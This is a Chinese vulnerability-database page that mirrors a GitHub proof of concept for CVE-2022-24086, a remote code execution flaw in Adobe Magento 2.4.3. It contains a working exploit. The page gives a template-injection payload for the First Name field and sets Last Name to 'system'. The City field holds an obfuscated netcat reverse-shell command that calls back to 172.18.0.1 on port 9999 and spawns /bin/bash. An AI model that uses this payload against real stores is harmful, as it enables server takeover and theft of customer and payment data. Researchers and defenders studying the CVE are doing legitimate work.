漏洞平台

POC详情： 6403c65c06a64581d2f9bd88d65a45f7537f3604

来源

https://github.com/pescepilota/CVE-2022-24086

关联漏洞

标题： Adobe Magento 输入验证错误漏洞 (CVE-2022-24086)
描述：Adobe Magento是美国奥多比（Adobe）公司的一套开源的PHP电子商务系统。该系统提供权限管理、搜索引擎和支付网关等功能。 Adobe Magento 存在输入验证错误漏洞，该漏洞源于输入验证不当。攻击者可利用该漏洞向应用程序发送专门设计的请求，并在目标系统上执行任意代码。

描述

Proof of concept of CVE-2022-24086

介绍

# CVE-2022-24086

Tested with: magento 2.4.3 and sample data
Docker image: docker.io/bitnami/magento:2.4.3-debian-10-r0


First Name:
~~~
{{var this.getTemplateFilter().filter($order.shipping_address.city)}}{{var this.getTemplateFilter().addAfterFilterCallback($order.shipping_address.last_name).filter($order.shipping_address.city)}}
~~~
Last Name:
~~~
system
~~~
City:
~~~
nc${IFS%??}172.18.0.1${IFS%??}9999${IFS%??}-e${IFS%??}/bin/bash
~~~

Testing rce:

![magento-cve-2022-24-086-callback_func](https://user-images.githubusercontent.com/47446178/208698581-d5a026e4-5465-4325-b98d-5365739174a4.png)

文件快照


 [4.0K]  /data/pocs/6403c65c06a64581d2f9bd88d65a45f7537f3604
├── [1.3K]  docker-compose.yml
└── [ 602]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。